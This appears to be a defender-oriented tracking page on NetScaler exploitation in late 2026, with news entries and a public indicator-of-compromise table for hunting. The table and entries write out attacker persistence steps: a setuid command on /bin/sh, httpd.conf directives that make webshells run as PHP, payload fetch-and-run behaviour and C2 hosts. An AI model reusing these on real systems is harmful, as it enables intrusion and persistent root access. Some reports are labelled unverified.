BSI (Germany) updates its warning and recommends this site's IoC list
BSI's TLP:CLEAR warning BITS-H 2026-289305-1132 (version 1.1, 1 Oct) rates the criticality 3 / Orange, meaning act immediately. It says logs should be checked back to at least early September, that patching alone does not remove a compromise, and that operators should check for a compromise even if they patched on release day. In its update it links to PitScaler as a place that collects detection options and IoCs from several sources, and recommends that operators use the growing IoC list.
Sources: [18]
- Official advisory Validated
Citrix ships version 4 of its IoC detection logic
Citrix has released a fourth version of the IoC detection logic used by the NetScaler Console scan. Citrix's documentation says the logic keeps being updated and that Console shows when an update is available, so rerun the scan after updating.
Version 4 validated independently on 1 Oct.
Sources: [6]
- Research
Analysis: "NetScaler Needs More Than Another Patch" - the case against treating each emergency as the fix
A long-form analysis by "Martin" (mac.sploit.dk, 08:00 CEST, opinion; the site's about page says only that the author has "spent a long time working in cybersecurity") argues that the recurring emergency-patch cycle is the wrong frame. Its claims, each with stated boundaries: NetScaler 14.1 runs a vendor-modified FreeBSD 11.4 base (upstream EOL since September 2021); of 107 examined executables under /netscaler, 106 lack PIE and only one has RELRO (from the author's earlier lab assessment of build 73.30, not evidence of an internet-reachable path); most packet and control-plane services observed ran as root with no visible privilege drop, and the author reports a locally demonstrated authentication failure in the privileged configuration service. It reads Citrix's 1 October NetScaler 15.1-9.30 Tech Preview (FreeBSD to Linux, BLX/DPDK data plane, ASLR, SELinux auditing, Yama, faster third-party patching) as promising platform work that does not fix NetScaler's own application-layer bugs, and notes it is a days-old vendor-described preview, not independently tested. Also notes CVE-2026-88771 was a root Perl script passing failed-login text to a shell via backticks - command construction, not memory corruption - so memory-safety roadmaps alone would not have stopped it. Renewal-meeting checklist included (SBOM, privilege separation evidence, mitigation settings, session-kill guidance, ZTNA off-ramp). All vendor bulletins it cites are already on this page.
Sources: [32]
- Reported observation Validated
Beaumont: patched honeypots crash, "we may have PitScaler 2"
Beaumont says his patched 13.1 and 14.1 honeypots are crashing, from multiple source IPs, and posts greps for authentication-daemon (nsaaad) crashes and pitboss restart messages in ns.log, one of them for 213.209.159.55. The two screenshots in the post show a write-up (author not named) about two 14.1-73.37 appliances that rebooted repeatedly after nsaaad crashed with exit status 0x8a and hit the restart limit of six. On one of them, crafted usernames on SAML factors told the appliance to fetch a payload from 213.209.159.55 over plain HTTP on port 443, save it as /v and run it, just before each crash. The write-up says this shows exploitation attempts and correlated crashes, not confirmed command execution, a CVE or a firmware regression, and adds *.pyrlink.cc as a later delivery source. This is unverified: at the time there was no CVE and no vendor or CERT statement.
Post text and both screenshots read directly on 2 Oct.
Sources: [74]
- Reported observation Validated
Beaumont: the pitboss fix "looks bypassable" (to be confirmed)
In a reply to his honeypot post, Beaumont says that, to be confirmed, it looks like the pitboss fix is bypassable. He gives no technical detail, and Citrix has not said whether builds with the CTX697096 fixes are affected by the new SAML issue.
Post text read directly on 2 Oct.
Sources: [76]
- Reported observation Validated
Beaumont: a patched honeypot is running a downloaded binary
Beaumont says one of his honeypots is running a downloaded (malware) binary, that both were patched so he concludes it is a new vulnerability, and that it is being sprayed and prayed. One honeypot has no valid TLS certificate because he let it expire. He does not say whether the honeypots had SAML configured, and Citrix lists no affected versions yet. These are one researcher's observations and conclusions.
Post text read directly on 2 Oct.
Sources: [77]
- Reported observation
Beaumont: the responder policy he says Citrix shared as a SAML workaround does not work for him
Asked by O_P whether he tried the responder policy from Citrix Support on his crashing honeypot - and whether enhanced ISN was on and he saw the reboots others report - Beaumont replies that "the policy citrix gave out doesn't work for me". This implies Citrix Support is sharing a responder policy as a workaround for the new SAML issue, and that it has not worked on at least one appliance. Single source; the policy text has not been seen, Citrix's own post does not mention any policy, and he does not answer the enhanced-ISN or reboot questions in the reply.
Sources: [78]
- Official advisory
Citrix publishes guidance on a new SAML issue, independent of CTX697096
Citrix says it is tracking a newly observed issue related to SAML authentication in customer-managed NetScaler deployments. The issue is associated with deployments that use SAML authentication in conjunction with Gateway or AAA functionality, and is configuration dependent based on the information currently available. The NetScaler is affected when at least one of the following SAML commands is present in the configuration: add authentication samlAction.* or add authentication samlIdPProfile.*. Recommended action: inspect the Gateway and AAA configuration for a SAML authentication action, contact Citrix support if currently experiencing impact, and upgrade to the updated software as soon as possible once the security bulletin is published. Citrix says the issue is independent of the vulnerabilities disclosed in CTX697096, that a new security bulletin and simultaneous product update release is planned, and that it will update the blog as more information becomes available. The post lists no CVE, affected versions, fixed builds or workaround yet, and points to the upcoming bulletin for the definitive list of affected versions, fixed builds and applicability conditions. Last updated 2 October (Pacific Daylight Time). Beaumont links the post at 20:00 UTC; his post was edited at 20:15 UTC, softening "pitboss will execute commands again" to "something will execute commands again" (per the edit history of the post).
- Reported observation
Beaumont: "The Citrix support mitigations don't appear to work"; admins firewall-blocking attacker IPs
Beaumont posts that the Citrix support mitigations do not appear to work, that admins are firewall-blocking known threat-actor IPs as a mitigation instead, and that many people cannot reach Citrix Support ("they've replaced people with AI chat bots"). His screenshot is an r/Citrix thread ("vulnerability scans causing netscaler reboots") where anonymous commenters report NetScaler restarts, one saying the responder-policy fix they received "didnt change anything", another that blackholing the attack IPs "semi works till they change their ip", and a third describing an endless Citrix support chatbot loop. Anonymous Reddit comments relayed via one researcher: unverified, no policy text, and no new IoCs. The thread matches the crash and reboot pattern in the earlier 14.1-73.37 screenshots.
- Reported observation
heise: mass spontaneous reboots on fully patched devices; exploit "apparently circulating" since the evening of 2 October
heise online (Dr. Christopher Kunz, 10:23 CEST) reports that security researchers and administrators are seeing mass spontaneous reboots of devices that were on the latest patch level, that an exploit for the new issue has apparently been circulating since the evening hours of 2 October, and that it can likely be triggered by sending SAML requests in bulk to a vulnerable device. It relays Beaumont's honeypot findings (a downloaded malware binary running on patched devices, so "new vulnerability") and frames the new issue as a possible bypass of the September fix - his framing, not Citrix's. It quotes the claim that "the watchTowr Labs team has now successfully reproduced the vulnerability" without naming its source; watchTowr's own X post the same day confirms the reproduction in its own words (see the next entry). heise notes Citrix's blog names no effective countermeasures and no patch exists yet, and links the same r/Citrix reboot thread. Says it will update the article continuously.
- Reported observation Approximate date
Cybersecurity News rounds up the 14.1-73.37 reboot reports: crafted SAML traffic crashing nsaaad, pitboss restarting appliances
Cybersecurity News (Guru Baran, article dated 3 October; the page shows only the date - earliest observed trace is a Bluesky share at 03:06 UTC, so the publication time is approximate) reports that customers are seeing repeated appliance reboots after installing build 14.1-73.37, linking them to crafted SAML authentication traffic that crashes the nsaaad authentication service until the pitboss watchdog restarts the appliance. It relays anonymous Reddit reports of severity-one cases with Citrix and of Citrix support "reportedly" preparing a fix, and states itself that these reports "do not yet prove attackers have bypassed the September patch" - a crash of nsaaad may be denial of service only, without sender control of the device. Secondary source: the underlying claims are anonymous forum posts it does not link individually, no new technical detail beyond the earlier r/Citrix thread, no Citrix statement, and no new IoCs. Its advice (preserve core files and logs before another restart, correlate reboot times with inbound SAML requests, check nsaaad crash messages in /var/core) matches the checks already on this page.
- Research
watchTowr confirms it has reproduced the new vulnerability; mitigation rulesets for platform clients only
watchTowr posts on X: "Unfortunately? Fortunately? the watchTowr Labs team has now successfully reproduced this vulnerability. watchTowr Platform clients now have mitigation rulesets available to them via our Active Defense capability. Speak soon." The post does not name the vulnerability; in context it is understood to be the SAML issue that heise quoted the same day, and that reading is this site's inference, not watchTowr's statement. What the post itself establishes, in watchTowr's own words: it has reproduced a vulnerability and has mitigation rulesets for Platform clients via Active Defense. Nothing indicates a public ruleset, advisory or IoCs yet. This site lists no watchTowr SAML indicators, and none are implied by this post.
- Official advisory
Citrix releases a new responder policy via Support (3 October); not yet in Citrix's public post
Citrix has released a new responder policy as a mitigation for the SAML issue, distributed through Citrix Support on 3 October. The Poppelgaard checker README describes it and recognises it by behaviour on the appliance: any responder policy whose rule mentions samlauth or doAuthentication, bound to a Gateway/AAA vserver or globally, alongside Citrix's earlier RSP_POL_DROP and community Gotham policies. Citrix's public SAML post does not mention the policy yet and its text has not been published; distribution is through Support (under NDA), which matches Beaumont's reports of a responder policy shared through Support ("the policy citrix gave out doesn't work for me" on Oct 2, "the Citrix support mitigations don't appear to work" on Oct 3). The checker reminds admins to ask Citrix Support for the new policy and verifies whether it is bound - and flags a [CHECK] state where a policy is bound but the Responder feature is disabled, which silently ignores it.
- Research
FreeBSD Sliver C2 implant tied to pylrk.cc delivery: independent malware analysis (TLP:CLEAR), corroborated by Expel IR
A TLP:CLEAR malware analysis report dated 2 October ties the two 2 October threads together: the payload served at f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host is a Sliver C2 implant cross-compiled for FreeBSD - the operating system under NetScaler - built specifically for these appliances. Statically linked stripped Go ELF64, 8,822,784 bytes. Static strings (sample not executed): hardcoded C2 https://www.pylrk.cc, protocol tag pylrkfbsd, IMPLANT_CAPABILITY_TUNNEL_TERMINAL_V1 with tunnel/reverse-shell capability (consistent with the netcat-style callbacks Expel described in this campaign), a spoofed Chrome 108/Windows User-Agent for its own beacons, and no embedded IP - C2 resolves via DNS to pylrk.cc. VirusTotal: 31 of 75 engines, all Sliver/Vilers labels; first submitted 2 Oct 11:49 UTC; recorded filenames /var/tmp/.host, /private/var/tmp/.host and citrix3.bad (appliance paths). Corroboration: an Expel IR observation of exploitation against a NetScaler Gateway in late Sep-early Oct. This connects the pylrk.cc delivery domain to actual malware, and distinguishes this FreeBSD implant from the Perl webshell hosted on 213.209.159.55 (a separate, weaker-signal payload). The report is vendor-independent: no vendor or CERT has published on it. IoCs are on this page's IoC list.
- Official advisory
ACSC update: the new SAML issue affects Australian organisations; "crashes, denial of service and potential exploitation"
ASD's Australian Cyber Security Centre adds an "Update 3 October 2026" section to its alert: Citrix has published guidance about a newly identified issue affecting NetScaler deployments that use SAML authentication; a remote attacker exploiting the issue may induce system crashes, denial of service and potential exploitation; and ASD's ACSC is aware of impacts to Australian organisations. It advises organisations using NetScaler SAML authentication to review their configurations, monitor for unusual activity, follow Citrix's advice, contact Citrix support if impacted, and report to ACSC. It states the issue is understood to be separate from CVE-2026-88771 and CVE-2026-88772. This is the first government confirmation of impact from the new SAML issue, and it stops short of the September-patch-bypass claim: awareness of impacts is not the same as a confirmed bypass of 14.1-73.37. Alert first published 28 Sep, page last updated 3 Oct.
Public IoCs Public / TLP:CLEAR only
This table only contains indicators that have been published openly. The Sharing column shows each source's own marking. [53][57][33][34]
- GreyNoise published its set on 28 September, marked TLP:CLEAR. GreyNoise has announced a longer "GreyNoise Labs" version, but the link on its blog was still a placeholder on 29 September.
- IFIN says the observables it shares were shared without restriction.
- Truesec's page is public and has no TLP marking.
- GTIG/Mandiant's blog is public and has no TLP marking. GTIG keeps its full IoC collection for registered GTI users only.
Indicators are not proof of compromise by themselves. Validate any hit against appliance logs, filesystem integrity, process history and configuration changes, following your incident-response procedure.
How to read these. Each indicator was observed by the source named in its row. None of them is a universal indicator for every victim. Beaumont reports that webshell names and attacker IPs are unique per victim. [66][70] An empty search result proves nothing.
Download all IoCs as CSV Firewall blocklist (93 IPs, annotated) Plain IP list Domain blocklist (pylrk.cc wildcard, annotated) Plain domain list
The blocklist contains only the IPv4 indicators whose own source data does not warn against blocking. It excludes Cloudflare WARP egress, shared commercial VPN exits, residential/ISP (CGNAT) addresses and a domain-parking IP — those are in the CSV with their caveats. IPs differ per victim; a blocklist is defence in depth, not a substitute for patching and compromise checks.
| Type | Exact value | Source | Context | Caveat | Sharing |
|---|---|---|---|---|---|
| IPv4 | 149.104.78.141 | GreyNoise blog [53]; GreyNoise Visualizer [55]; eSentire TRU [48] | Exploitation source, Sep 24 (3 sessions 07:32:19-07:32:20 UTC). GreyNoise Visualizer on Sep 29: AS154177 LIGHT NODE LIMITED, Japan; not observed mass scanning in the past day. | Observed in GreyNoise sensor data; not a universal indicator for every victim. Beaumont reports attacker IPs vary per victim. eSentire also lists it as an exploitation source. | TLP:CLEAR |
| File path | /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver | GreyNoise blog [53]; Unit 42 (Palo Alto Networks) [96]; Sygnia [37] | Webshell path on disk | Observed in GreyNoise sensor data; not a universal indicator for every victim. Beaumont reports webshell names are unique per victim. | TLP:CLEAR |
| URL alias | receiver.min.css | GreyNoise blog [53] | Webshell alias | Observed in GreyNoise sensor data; not a universal indicator for every victim. | TLP:CLEAR |
| AliasMatch regex | receiver\.min\.[0-9a-f]+\.css | GreyNoise blog [53]; CERT-EU [27] | Apache config (httpd.conf) AliasMatch | Observed in GreyNoise sensor data; not a universal indicator for every victim. Pattern as published; also check httpd.conf integrity generally. | TLP:CLEAR |
| SHA-256 | 6f5a2a452a7901323abd21879c6cecccb47c06aeeaccb1b467212f3b11e4b1e7 | GreyNoise blog [53] | Webshell hash | Observed in GreyNoise sensor data; not a universal indicator for every victim. Per-victim webshells may differ. | TLP:CLEAR |
| GreyNoise tag | Citrix NetScaler CVE-2026-88771 Login Command Injection RCE Attempt | GreyNoise tag [56]; GreyNoise blog [53] | Sensor detection tag, created Sep 27. GreyNoise Visualizer on Sep 29: 76 unique IPs tagged between Sep 19 and Sep 29, all classified malicious. All are listed in this table; two are Cloudflare WARP exits, marked as such. | Classifies traffic seen by GreyNoise and community sensors only. Most tagged IPs also carry crawler and CitrixBleed 2 tags, so many look like opportunistic scanning. | TLP:CLEAR |
| SHA-256 | ed082f744f035035900f67edf438f2f7d0528ac501234f63d476d65273cdb9a1 | IFIN [57] | .ctxs.receiver webshell sample (237-byte PHP file) posted by a Reddit user, relayed by IFIN | Unconfirmed single-victim sample. The hardcoded token likely differs per victim, so the hash will too - match on file content, not hash. | Public, no restriction |
| IPv4 | 104.248.244.66 | Truesec [33]; IFIN [57]; Unit 42 (Palo Alto Networks) [96] | Potential C2 IP observed by Truesec | IR-vendor observation. Beaumont reports attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host. | Public page, no TLP marking |
| IPv4 | 139.180.152.138 | Truesec [33]; IFIN [57]; eSentire TRU [48]; Unit 42 (Palo Alto Networks) [96] | Potential C2 IP observed by Truesec; webshell delivery per eSentire | IR-vendor observation. Beaumont reports attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host. | Public page, no TLP marking |
| IPv4 | 77.83.199.39 | Truesec [33]; IFIN [57]; eSentire TRU [48]; Unit 42 (Palo Alto Networks) [96]; Sygnia [37] | Potential C2 IP observed by Truesec; webshell delivery per eSentire | IR-vendor observation. Beaumont reports attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host. | Public page, no TLP marking |
| IPv4 | 78.135.96.136 | IFIN [57] | Associated exploit source (IFIN compiled observables) | Compiled by IFIN from shared reports; the original reporter of each value is not stated. | Public, no restriction |
| IPv4 | 149.28.29.221 | IFIN [57] | Associated exploit source (IFIN compiled observables) | Compiled by IFIN from shared reports; the original reporter of each value is not stated. | Public, no restriction |
| IPv4 | 80.240.22.229 | IFIN [57] | Associated exploit source (IFIN compiled observables) | Compiled by IFIN from shared reports; the original reporter of each value is not stated. | Public, no restriction |
| IPv4 | 89.36.231.206 | IFIN [57] | Associated exploit source (IFIN compiled observables) | Compiled by IFIN from shared reports; the original reporter of each value is not stated. | Public, no restriction |
| IPv4 | 91.195.240.123 | IFIN [57] | Associated exploit source (IFIN compiled observables) | Compiled by IFIN from shared reports; the original reporter of each value is not stated. WHOIS: SEDO-NET, Sedo Domain Parking - a shared parking IP used by many unrelated parked domains. Expect heavy false positives; do not block on it alone. | Public, no restriction |
| IPv4 | 143.198.7.94 | Google GTIG / Mandiant [34] | Scanning and staging infrastructure | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| IPv4 | 157.254.167.12 | Google GTIG / Mandiant [34] | NetScaler exploitation and installation of a basic webshell backdoor | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| HTTP header | HTTP_NSC_LDAP | Google GTIG / Mandiant [34] | Inbound command execution header used by nsginstaller.deb | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| HTTP header | HTTP_NSC_CLIENTTYPE | Google GTIG / Mandiant [34] | Inbound command execution header used by nsgclient.sig | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| HTTP header | HTTP_X_UX / HTTP_X_UX_[0-9]+ | Google GTIG / Mandiant [34] | Chunked base64 transport headers used by WHIPSHOT | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| URI path | /vpn/media/nsgclient.ico / /vpn/media/*.ico | Google GTIG / Mandiant [34] | Masquerading icon request routed to a .sig webshell via AliasMatch | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsginstaller*.deb | Google GTIG / Mandiant [34] | Staging path for malicious PHP webshells | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsgclient*.deb | Google GTIG / Mandiant [34] | Staging path for malicious PHP webshells | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/*.php | Google GTIG / Mandiant [34] | Staging path for malicious PHP webshells | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| File path | /tmp/.uxdport | Google GTIG / Mandiant [34] | SLAPSHOT active port artefact | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| File path | /tmp/.uxdlock | Google GTIG / Mandiant [34] | SLAPSHOT process lock artefact | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| Config directive | AddHandler application/x-httpd-php .deb | Google GTIG / Mandiant [34] | httpd.conf change making .deb files run as PHP (GTIG persistence method A) | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Any AddHandler/AddType mapping a non-PHP extension to PHP indicates compromise, per GTIG. | Public blog, no TLP marking |
| Config directive | AddHandler application/x-httpd-php .sig | Google GTIG / Mandiant [34] | httpd.conf change making .sig files run as PHP (GTIG persistence method B) | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| Config directive | AliasMatch ^/vpn/media/(.+).ico$ /var/netscaler/gui/vpn/scripts/linux/$1.sig | Google GTIG / Mandiant [34] | Routes /vpn/media/*.ico requests to a .sig webshell with the same base name | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| File path | /netscaler/ns_gui/vpn/scripts/linux/ | Google GTIG / Mandiant [34] | Directory where WHIPSHOT was placed | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Legitimate client binaries live here too; look for ASCII text or PHP markers. | Public blog, no TLP marking |
| Filename pattern | nginstaller* | Google GTIG / Mandiant [34] | Installer webshell names seen across intrusions, often followed by a number | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. GTIG says filenames varied between victims. | Public blog, no TLP marking |
| Filename | nsgclient.sig | Google GTIG / Mandiant [34] | .sig webshell in VPN script directories | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| Filename | e6ee7c85.sig | Google GTIG / Mandiant [34] | GTIG example .sig webshell: reads base64 payloads from HTTP_NSC_CLIENTTYPE, runs them via eval() and returns a fake 404. Reached as /vpn/media/e6ee7c85.ico through the AliasMatch above | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Example from one intrusion; GTIG says filenames varied between victims, so absence proves nothing. | Public blog, no TLP marking |
| Log string | pitboss NOT restarting NSPPE | Google GTIG / Mandiant [34] | Watchdog message in /var/log/messages after an NSPPE crash | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Strongest when it follows a DTLSv1.0 SSL_HANDSHAKE_FAILURE on the same appliance. | Public blog, no TLP marking |
| String | UXD_IDLE_EXIT | Google GTIG / Mandiant [34] | SLAPSHOT idle-exit variable | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| Command | chmod u+s /bin/sh | Google GTIG / Mandiant [34]; GreyNoise blog [53] | Sets setuid on /bin/sh for persistent root; ls -l /bin/sh showing -rwsr-xr-x owned by root means modified | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. | Public blog, no TLP marking |
| IPv4 | 138.199.200.90 | Help Net Security (Sep 29) [98] | Destination for data exfiltrated via log poisoning (Hetzner), seen by Lupovis | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. | Public article, no TLP marking |
| IPv4 | 138.28.234.38 | Lupovis (@LupovisDefence) on X, Sep 28 [62]; Beazley Security advisory (updated Sep 29) [43] | Exploitation with attempted DNS exfiltration (Lupovis) | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. | Public article, no TLP marking |
| IPv4 | 82.167.14.7 | Beazley Security advisory (updated Sep 29) [43]; GreyNoise tag [56]; eSentire TRU [48] | Exploitation check that writes a test marker (Lupovis); exploitation source per eSentire; also tagged by GreyNoise | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. May be a researcher-style check. | Public article, no TLP marking |
| IPv4 | 85.203.46.191 | Beazley Security advisory (updated Sep 29) [43]; GreyNoise tag [56] | Reconnaissance (Lupovis) | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. WHOIS netname Express-Equinix-London; GreyNoise tags it as VPN, so likely a commercial VPN exit shared by many users. | Public article, no TLP marking |
| IPv4 | 154.217.251.226 | Beazley Security advisory (updated Sep 29) [43]; GreyNoise tag [56] | CVE-2026-88772 scanning (Lupovis); also tagged by GreyNoise | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. | Public article, no TLP marking |
| IPv4 | 194.26.29.88 | Corelight [44] | Host of the reverse shell documented by Corelight (WHOIS: Media Land LLC, RU) | Reverse-shell infrastructure; hunt for connections from NetScaler NSIP/SNIP addresses. | Public blog, no TLP marking |
| DNS pattern | *.instances.httpworkbench.com | Help Net Security (Sep 29) [98]; Beazley Security advisory (updated Sep 29) [43] | Outbound lookups from a NetScaler suggest an out-of-band callback (Lupovis hunt advice) | httpworkbench.com is a public HTTP/DNS testing service, also used by researchers. Hunt signal only when the lookup comes from a NetScaler; do not block the apex. | Public article, no TLP marking |
| HTTP request pattern | POST /nf/auth/doAuthentication.do with body containing "pitboss PPE unexpectedly died NSPPE" | Help Net Security (Sep 29) [98] | Log-poisoning exploitation attempt (Lupovis hunt advice) | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. | Public article, no TLP marking |
| URI path | /nf/auth/doAuthentication.do | Defused (@DefusedCyber) on X, Sep 29 [61]; Help Net Security (Sep 29) [98] | CVE-2026-88771 exploitation attempts seen on Defused decoys (any logged field works) | Hunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload. | Public post, no TLP marking |
| URI path | /cgi/login | Defused (@DefusedCyber) on X, Sep 29 [61] | CVE-2026-88771 exploitation attempts seen on Defused decoys | Hunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload. | Public post, no TLP marking |
| URI path | /p/u/doLogon.do | Defused (@DefusedCyber) on X, Sep 29 [61] | CVE-2026-88771 exploitation attempts seen on Defused decoys | Hunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload. | Public post, no TLP marking |
| URI path | /logon/LogonPoint/tmindex.html | Defused (@DefusedCyber) on X, Sep 29 [61] | CVE-2026-88771 exploitation attempts seen on Defused decoys | Hunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload. | Public post, no TLP marking |
| HTTP header | User-Agent (payload in the header on requests to /) | Defused (@DefusedCyber) on X, Sep 29 [61]; CERT-EU [27] | CVE-2026-88771 exploitation attempts seen on Defused decoys | Hunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload. CERT-EU separately flags base64 User-Agent strings starting with INDEX:. | Public post, no TLP marking |
| Filename | nx_verify.html | Defused (@DefusedCyber) on X, Sep 29 [61] | Marker file dropped to tag vulnerable boxes for a target list (Defused) | Also written by testers; means the box was reached and is exploitable, not necessarily that an actor installed a backdoor. | Public post, no TLP marking |
| SHA-256 | 5ea5ea61e9062822bee3f66ef5ff47c217178d9e31936ad6daf10c5dfae44d12 | eSentire TRU [48]; Sygnia [37] | PHP webshell, .ico variant (publicly on VirusTotal per eSentire); Sygnia also found it during an active IR investigation | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| SHA-256 | 7add390ceee4a1373211b3e340451b34f08965fc4d805f94c9b8cebdc0775774 | eSentire TRU [48] | PHP webshell, .deb variant (not in public repositories per eSentire) | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| File path | /var/netscaler/gui/vpn/scripts/linux/*.sig | eSentire TRU [48]; Google GTIG / Mandiant [34] | .ico-variant webshell location (eSentire); also matches GTIG method B | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| HTTP request pattern | GET /vpn/media/*.ico with base64 PHP (starting "PD9") appended to the User-Agent | eSentire TRU [48]; CERT-EU [27] | Payload staging via the access log (eSentire; matches CERT-EU technique) | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| IPv4 | 34.90.151.231 | eSentire TRU [48] | Reconnaissance and webshell delivery (eSentire) | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. Google Cloud address space; may be reassigned. | Public advisory, no TLP marking |
| IPv4 | 31.56.197.72 | eSentire TRU [48]; Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Payload host (eSentire); Arctic Wolf: served /lula on ports 80 and 9090, and /kk | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public advisory, no TLP marking |
| IPv4 | 64.94.85.67 | eSentire TRU [48]; GreyNoise tag [56]; Arctic Wolf [36]; Sygnia [37]; LevelBlue SpiderLabs (THOR team) [42] | Payload host (eSentire); also tagged by GreyNoise | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public advisory, no TLP marking |
| IPv4 | 23.27.143.20 | eSentire TRU [48]; Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Payload host (eSentire); Arctic Wolf: served main.py on port 9000, saved as /var/1.py and run with python | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public advisory, no TLP marking |
| IPv4 | 62.133.62.80 | eSentire TRU [48]; Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Payload host (eSentire) | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public advisory, no TLP marking |
| IPv4 | 144.172.108.78 | eSentire TRU [48] | Exploitation source (eSentire) | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| IPv4 | 185.156.46.162 | eSentire TRU [48]; GreyNoise tag [56] | Exploitation source (eSentire); also tagged by GreyNoise | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. GreyNoise tags it as VPN; may be shared. | Public advisory, no TLP marking |
| IPv4 | 153.75.82.220 | eSentire TRU [48]; GreyNoise tag [56]; Arctic Wolf [36] | Exploitation source (eSentire); also tagged by GreyNoise; Arctic Wolf: served /download/x.sh, piped to bash | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| IPv4 | 216.203.21.233 | eSentire TRU [48]; GreyNoise tag [56] | Exploitation source (eSentire); also tagged by GreyNoise | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| IPv4 | 185.243.41.247 | eSentire TRU [48] | Campaign infrastructure (eSentire) | eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. | Public advisory, no TLP marking |
| Network | UDP/443 (DTLSv1.0) | Google GTIG / Mandiant [34] | Delivery protocol for the CVE-2026-88772 exploit (GTIG) | Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Legitimate DTLS VPN traffic uses the same port; baseline normal DTLS sources. | Public blog, no TLP marking |
| Config directive | Alias /logon/LogonPoint/custom/receiver.min.css | Beazley Security Labs [49]; GreyNoise blog [53] | httpd.conf route to the .ctxs.receiver webshell (GreyNoise, via Beazley) | Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. | Public advisory, no TLP marking |
